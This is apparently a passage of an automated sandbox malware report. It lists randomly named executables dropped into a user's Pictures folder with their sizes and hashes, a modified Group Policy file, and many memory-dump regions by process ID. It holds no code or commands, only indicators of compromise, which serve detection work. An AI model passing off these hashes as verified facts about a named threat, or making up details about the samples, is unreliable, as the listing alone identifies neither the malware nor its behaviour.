C:\Users\Admin\Pictures\Minor Policy\lFyZ92vXmfbnHdGnC1PY_RhC.exeFilesize
714KB
MD5086fe35804c1c397aa0c338f4ba5b485
SHA172fb0c1301676f43269dafdd9a0b878d7b6bad97
SHA256de53e9a94cf357293dc9fe81b8ddb4d2e42208db9ef231e9a8ba15987ebc79d2
SHA512790b287fce52834927a46b77bb2164f2618151b269a0426019cfaf3430539fc3a6a6fc147bd982583a0724988d483a0f2b2d9d213e68ff1dee56630160a8e897
-
C:\Users\Admin\Pictures\Minor Policy\p0AC6yBn3ASw6LWWgTDhKQqw.exeFilesize
7.3MB
MD5d55e7c43a81b43f08aec09164b9d51d1
SHA112b49a341ef353cc2c72e4456d50591e9a29bc64
SHA256ada2b6a4b33962e1688f6f05643226582180fbc514a33178801609c1b969a8ca
SHA512fd3d22a51a4427eddefc6bafe9cab7873ab4ee381c4410eef71db11f816fb8c535fa52da45b153267ec34375a8307e4b6e56ac8fcad7cfdd699dfcc774bf6604
-
C:\Users\Admin\Pictures\Minor Policy\p0AC6yBn3ASw6LWWgTDhKQqw.exeFilesize
7.3MB
MD5d55e7c43a81b43f08aec09164b9d51d1
SHA112b49a341ef353cc2c72e4456d50591e9a29bc64
SHA256ada2b6a4b33962e1688f6f05643226582180fbc514a33178801609c1b969a8ca
SHA512fd3d22a51a4427eddefc6bafe9cab7873ab4ee381c4410eef71db11f816fb8c535fa52da45b153267ec34375a8307e4b6e56ac8fcad7cfdd699dfcc774bf6604
-
C:\Users\Admin\Pictures\Minor Policy\urnbMH0oDvkrvbrpwkSgNldb.exeFilesize
1.7MB
MD544eb7d1582acb3ed1e2d9e031002486b
SHA17573c102c335e7993458909370f4efba82c19c16
SHA2565c53c2d8bfbf7cdd02187a043feb2a028dcb0477257586946bca77cb6f58c7a1
SHA512f1b459d8a9e336a600bc35d08b525504144b0550e9704e500304112e9fecb5c5deea2f5959386cb4c0266c1a47f2d6141ae568271cc0b488bc087eca6f60c2f5
-
C:\Users\Admin\Pictures\Minor Policy\urnbMH0oDvkrvbrpwkSgNldb.exeFilesize
1.7MB
MD544eb7d1582acb3ed1e2d9e031002486b
SHA17573c102c335e7993458909370f4efba82c19c16
SHA2565c53c2d8bfbf7cdd02187a043feb2a028dcb0477257586946bca77cb6f58c7a1
SHA512f1b459d8a9e336a600bc35d08b525504144b0550e9704e500304112e9fecb5c5deea2f5959386cb4c0266c1a47f2d6141ae568271cc0b488bc087eca6f60c2f5
-
C:\Users\Admin\Pictures\Minor Policy\vUAFUhj9jvoWazidiFp5wtjX.exeFilesize
3.5MB
MD5c579ffbbe8d6604d01318d6a08e24324
SHA10f42f48139f2577a17b12fb210cee143301d8e08
SHA25634fd3c1727be1ac43b214e07a1a9c71965e8f06053a5b32919abd362f0df6240
SHA512d0d7d6eb65bfa5fa66575fe87bceb1955cfe9b91d34812d87e289222fa6440578f3b18ecbc6bce5bbe352140a5551fe39ae1772996a0097dfda0a942c05b62d5
-
C:\Users\Admin\Pictures\Minor Policy\vUAFUhj9jvoWazidiFp5wtjX.exeFilesize
3.5MB
MD5c579ffbbe8d6604d01318d6a08e24324
SHA10f42f48139f2577a17b12fb210cee143301d8e08
SHA25634fd3c1727be1ac43b214e07a1a9c71965e8f06053a5b32919abd362f0df6240
SHA512d0d7d6eb65bfa5fa66575fe87bceb1955cfe9b91d34812d87e289222fa6440578f3b18ecbc6bce5bbe352140a5551fe39ae1772996a0097dfda0a942c05b62d5
-
C:\Users\Admin\Pictures\Minor Policy\xLmGFtewVGx31R1dEvJapWTf.exeFilesize
369KB
MD5095ea376185f14059ddb07073003e56c
SHA1fe64a20fdf9325d7d5b14258e77aba1b5502550e
SHA256f08b3a925566dc86f7be4986161b016083df3b388bd60ddd41acd29090af565c
SHA51211244b3939873a81903d74bcb58a6c357228c3e314586cb6c8a65b71d02d943aa6b9b5d96b483306d6310c41231d028fefc0c30d18cc50874ffb51843af15c34
-
C:\Users\Admin\Pictures\Minor Policy\xLmGFtewVGx31R1dEvJapWTf.exeFilesize
369KB
MD5095ea376185f14059ddb07073003e56c
SHA1fe64a20fdf9325d7d5b14258e77aba1b5502550e
SHA256f08b3a925566dc86f7be4986161b016083df3b388bd60ddd41acd29090af565c
SHA51211244b3939873a81903d74bcb58a6c357228c3e314586cb6c8a65b71d02d943aa6b9b5d96b483306d6310c41231d028fefc0c30d18cc50874ffb51843af15c34
-
C:\Users\Admin\Pictures\Minor Policy\xqKmRxyI9yMan9smqcBne3I2.exeFilesize
611KB
MD5742b5f10679cf48e2ecedaace71e4750
SHA18b2a9eb43d14617e07c15af550351be18196b778
SHA256a010dbebffc12636e3f3269758969ca314b2a893f62a304aa77ed7683d6acabb
SHA512ccd2d6a09aa5e97558a86a701113924d5ab2124ebb4b91aa0f69615d6090909dadca7a46106e896ac4cf9d9a87d7fcc98251c4f26d9c6aae91c9fe0d0eedfc1c
-
C:\Windows\system32\GroupPolicy\gpt.iniFilesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
memory/504-312-0x0000000001550000-0x00000000015A0000-memory.dmpFilesize
320KB
-
memory/504-206-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/504-216-0x00000000090E0000-0x000000000911C000-memory.dmpFilesize
240KB
-
memory/504-309-0x0000000005BB0000-0x0000000005C26000-memory.dmpFilesize
472KB
-
memory/504-328-0x0000000009590000-0x0000000009752000-memory.dmpFilesize
1.8MB
-
memory/504-209-0x0000000006450000-0x0000000006A68000-memory.dmpFilesize
6.1MB
-
memory/504-249-0x0000000006030000-0x00000000060C2000-memory.dmpFilesize
584KB
-
memory/504-210-0x0000000009190000-0x000000000929A000-memory.dmpFilesize
1.0MB
-
memory/504-215-0x0000000009080000-0x0000000009092000-memory.dmpFilesize
72KB
-
memory/504-198-0x0000000000000000-mapping.dmp
-
memory/504-332-0x000000000AC50000-0x000000000B17C000-memory.dmpFilesize
5.2MB
-
memory/660-377-0x00000000034E0000-0x00000000035A3000-memory.dmpFilesize
780KB
-
memory/660-318-0x0000000000000000-mapping.dmp
-
memory/660-381-0x00000000035B0000-0x000000000365C000-memory.dmpFilesize
688KB
-
memory/660-382-0x00000000035B0000-0x000000000365C000-memory.dmpFilesize
688KB
-
memory/984-345-0x00000000022C1000-0x0000000002353000-memory.dmpFilesize
584KB
-
memory/984-310-0x0000000000000000-mapping.dmp
-
memory/1016-204-0x0000000000100000-0x0000000000120000-memory.dmpFilesize
128KB
-
memory/1016-227-0x0000000005580000-0x00000000055A2000-memory.dmpFilesize
136KB
-
memory/1016-199-0x0000000000000000-mapping.dmp
-
memory/1076-132-0x00000000009D0000-0x000000000128B000-memory.dmpFilesize
8.7MB
-
memory/1440-172-0x0000000000000000-mapping.dmp
-
memory/1464-203-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1464-313-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1464-189-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1464-257-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1464-186-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1464-182-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/1464-180-0x0000000000000000-mapping.dmp
-
memory/1540-315-0x0000000000000000-mapping.dmp
-
memory/1596-178-0x0000000002360000-0x000000000247B000-memory.dmpFilesize
1.1MB
-
memory/1596-140-0x0000000000000000-mapping.dmp
-
memory/1596-177-0x00000000022C4000-0x0000000002356000-memory.dmpFilesize
584KB
-
memory/1640-188-0x0000000000400000-0x0000000000580000-memory.dmpFilesize
1.5MB
-
memory/1640-218-0x0000000000400000-0x0000000000580000-memory.dmpFilesize
1.5MB
-
memory/1640-181-0x00000000006BC000-0x00000000006CD000-memory.dmpFilesize
68KB
-
memory/1640-187-0x00000000005F0000-0x00000000005F9000-memory.dmpFilesize
36KB
-
memory/1640-138-0x0000000000000000-mapping.dmp
-
memory/1984-163-0x0000000000000000-mapping.dmp
-
memory/2196-340-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/2196-338-0x0000000000000000-mapping.dmp
-
memory/2436-156-0x0000000000000000-mapping.dmp
-
memory/2436-170-0x0000000005970000-0x0000000005F14000-memory.dmpFilesize
5.6MB
-
memory/2436-166-0x0000000000B50000-0x0000000000C08000-memory.dmpFilesize
736KB
-
memory/2832-162-0x0000000140000000-0x000000014060E000-memory.dmpFilesize
6.1MB
-
memory/2832-141-0x0000000000000000-mapping.dmp
-
memory/2928-158-0x0000000000000000-mapping.dmp
-
memory/3476-214-0x0000000000000000-mapping.dmp
-
memory/3504-137-0x0000000000000000-mapping.dmp
-
memory/3544-248-0x0000000002D10000-0x0000000002E15000-memory.dmpFilesize
1.0MB
-
memory/3544-350-0x0000000002D10000-0x0000000002E15000-memory.dmpFilesize
1.0MB
-
memory/3544-247-0x0000000002AF0000-0x0000000002BF9000-memory.dmpFilesize
1.0MB
-
memory/3544-258-0x0000000002E20000-0x0000000002EDF000-memory.dmpFilesize
764KB
-
memory/3544-191-0x0000000000000000-mapping.dmp
-
memory/3544-259-0x0000000002EF0000-0x0000000002F9A000-memory.dmpFilesize
680KB
-
memory/3796-176-0x0000000000000000-mapping.dmp
-
memory/3940-139-0x0000000000000000-mapping.dmp
-
memory/4140-327-0x0000000000000000-mapping.dmp
-
memory/4236-179-0x0000000000000000-mapping.dmp
-
memory/4236-192-0x0000000010000000-0x0000000010B5F000-memory.dmpFilesize
11.4MB
-
memory/4304-135-0x0000000000000000-mapping.dmp
-
memory/4472-200-0x0000000000400000-0x0000000000596000-memory.dmpFilesize
1.6MB
-
memory/4472-136-0x0000000000000000-mapping.dmp
-
memory/4472-246-0x00000000008FC000-0x0000000000923000-memory.dmpFilesize
156KB
-
memory/4472-256-0x0000000000400000-0x0000000000596000-memory.dmpFilesize
1.6MB
-
memory/4472-190-0x00000000008FC000-0x0000000000923000-memory.dmpFilesize
156KB
-
memory/4472-193-0x00000000007F0000-0x000000000082F000-memory.dmpFilesize
252KB
-
memory/4756-344-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4756-349-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4756-346-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/4936-337-0x0000000000000000-mapping.dmp
-
memory/4988-157-0x0000000000000000-mapping.dmp
-
memory/30260-205-0x0000000000000000-mapping.dmp
-
memory/30396-319-0x00000000040E0000-0x0000000004334000-memory.dmpFilesize
2.3MB
-
memory/30396-229-0x00000000040E0000-0x0000000004334000-memory.dmpFilesize
2.3MB
-
memory/30396-211-0x0000000000000000-mapping.dmp
-
memory/30740-219-0x0000000000000000-mapping.dmp
-
memory/30764-217-0x0000000000000000-mapping.dmp
-
memory/30940-220-0x0000000000000000-mapping.dmp
-
memory/31000-221-0x0000000000000000-mapping.dmp
-
memory/31088-222-0x0000000000000000-mapping.dmp
-
memory/31216-333-0x0000000000000000-mapping.dmp
-
memory/31244-223-0x0000000000000000-mapping.dmp
-
memory/31308-224-0x0000000000000000-mapping.dmp
-
memory/31352-225-0x0000000000000000-mapping.dmp
-
memory/31480-226-0x0000000000000000-mapping.dmp
-
memory/31652-302-0x0000000007440000-0x0000000007ABA000-memory.dmpFilesize
6.5MB
-
memory/31652-233-0x0000000005560000-0x00000000055C6000-memory.dmpFilesize
408KB
-
memory/31652-228-0x0000000000000000-mapping.dmp
-
memory/31652-230-0x0000000004690000-0x00000000046C6000-memory.dmpFilesize
216KB
-
memory/31652-231-0x0000000004DF0000-0x0000000005418000-memory.dmpFilesize
6.2MB
-
memory/31652-232-0x00000000054F0000-0x0000000005556000-memory.dmpFilesize
408KB
-
memory/31652-244-0x0000000005B90000-0x0000000005BAE000-memory.dmpFilesize
120KB
-
memory/31652-304-0x00000000060F0000-0x000000000610A000-memory.dmpFilesize
104KB
-
memory/33668-235-0x0000000000000000-mapping.dmp
-
memory/48088-245-0x0000000000000000-mapping.dmp
-
memory/48124-307-0x0000000000000000-mapping.dmp
-
memory/48256-263-0x0000000000000000-mapping.dmp
-
memory/48304-369-0x0000000003270000-0x000000000332F000-memory.dmpFilesize
764KB
-
memory/48304-370-0x0000000003330000-0x00000000033DA000-memory.dmpFilesize
680KB
-
memory/48304-264-0x0000000000000000-mapping.dmp
-
memory/48412-353-0x0000000000C70000-0x0000000001F2B000-memory.dmpFilesize
18.7MB
-
memory/48412-266-0x0000000000000000-mapping.dmp
-
memory/48412-297-0x0000000000C70000-0x0000000001F2B000-memory.dmpFilesize
18.7MB
-
memory/48424-267-0x0000000000000000-mapping.dmp
-
memory/48424-321-0x0000000000F10000-0x00000000021CC000-memory.dmpFilesize
18.7MB
-
memory/48436-330-0x0000000000000000-mapping.dmp
-
memory/48444-320-0x0000000007040000-0x000000000705E000-memory.dmpFilesize
120KB
-
memory/48444-298-0x0000000000170000-0x00000000001EC000-memory.dmpFilesize
496KB
-
memory/48444-268-0x0000000000000000-mapping.dmp
-
memory/48456-269-0x0000000000000000-mapping.dmp
-
memory/48468-270-0x0000000000000000-mapping.dmp
-
memory/48468-306-0x00000000005F0000-0x000000000189E000-memory.dmpFilesize
18.7MB
-
memory/48480-272-0x0000000000000000-mapping.dmp
-
memory/48488-317-0x0000000000400000-0x00000000004CE000-memory.dmpFilesize
824KB
-
memory/48488-294-0x0000000000400000-0x00000000004CE000-memory.dmpFilesize
824KB
-
memory/48488-271-0x0000000000000000-mapping.dmp
-
memory/48516-273-0x0000000000000000-mapping.dmp
-
memory/48516-355-0x0000000000710000-0x0000000001990000-memory.dmpFilesize
18.5MB
-
memory/48516-316-0x0000000000710000-0x0000000001990000-memory.dmpFilesize
18.5MB
-
memory/48524-322-0x0000000000400000-0x0000000000596000-memory.dmpFilesize
1.6MB
-
memory/48524-334-0x00000000008DC000-0x0000000000903000-memory.dmpFilesize
156KB
-
memory/48524-275-0x0000000000000000-mapping.dmp
-
memory/48536-274-0x0000000000000000-mapping.dmp
-
memory/48564-278-0x0000000000000000-mapping.dmp
-
memory/48572-279-0x0000000000000000-mapping.dmp
-
memory/48592-301-0x00000000054F0000-0x000000000558C000-memory.dmpFilesize
624KB
-
memory/48592-299-0x0000000000400000-0x000000000044A000-memory.dmpFilesize
296KB
-
memory/48592-280-0x0000000000000000-mapping.dmp
-
memory/48600-281-0x0000000000000000-mapping.dmp
-
memory/48600-326-0x0000000000400000-0x0000000000580000-memory.dmpFilesize
1.5MB
-
memory/48600-335-0x00000000006FC000-0x000000000070D000-memory.dmpFilesize
68KB
-
memory/48600-324-0x00000000005B0000-0x00000000005B9000-memory.dmpFilesize
36KB
-
memory/48600-348-0x0000000000400000-0x0000000000580000-memory.dmpFilesize
1.5MB
-
memory/48628-284-0x0000000000000000-mapping.dmp
-
memory/48628-305-0x0000000140000000-0x000000014060E000-memory.dmpFilesize
6.1MB
-
memory/48672-325-0x0000000000000000-mapping.dmp
-
memory/48816-295-0x0000000000000000-mapping.dmp
-
memory/48948-323-0x0000000000000000-mapping.dmp
-
memory/48972-300-0x0000000000000000-mapping.dmp
-
memory/48972-342-0x0000000000400000-0x0000000000580000-memory.dmpFilesize
1.5MB
-
memory/48972-339-0x000000000089C000-0x00000000008AD000-memory.dmpFilesize
68KB
-
memory/48972-341-0x00000000006C0000-0x00000000006C9000-memory.dmpFilesize
36KB
-
memory/49028-303-0x0000000000000000-mapping.dmp
-
memory/49100-402-0x0000000002F90000-0x0000000003040000-memory.dmpFilesize
704KB
-
memory/49100-400-0x0000000002EC0000-0x0000000002F86000-memory.dmpFilesize
792KB
-
memory/49100-409-0x0000000002F90000-0x0000000003040000-memory.dmpFilesize
704KB
-
memory/49608-365-0x0000000010000000-0x0000000010B5F000-memory.dmpFilesize
11.4MB
-
memory/49736-352-0x0000022013BC0000-0x0000022013C02000-memory.dmpFilesize
264KB
-
memory/49736-351-0x0000022013660000-0x00000220137B8000-memory.dmpFilesize
1.3MB
-
memory/49736-354-0x00007FFE34000000-0x00007FFE34AC1000-memory.dmpFilesize
10.8MB
-
memory/50828-389-0x0000000000400000-0x00000000004CF000-memory.dmpFilesize
828KB
-
memory/50856-392-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/50856-394-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/50856-390-0x0000000000400000-0x0000000000537000-memory.dmpFilesize
1.2MB
-
memory/50956-396-0x0000000000400000-0x0000000000428000-memory.dmpFilesize
160KB
-
memory/51192-404-0x0000000000400000-0x000000000045B000-memory.dmpFilesize
364KB
-
memory/51192-405-0x0000000000400000-0x000000000045B000-memory.dmpFilesize
364KB
-
memory/51192-408-0x0000000000400000-0x000000000045B000-memory.dmpFilesize
364KB
-
memory/51192-424-0x0000000061E00000-0x0000000061EF3000-memory.dmpFilesize
972KB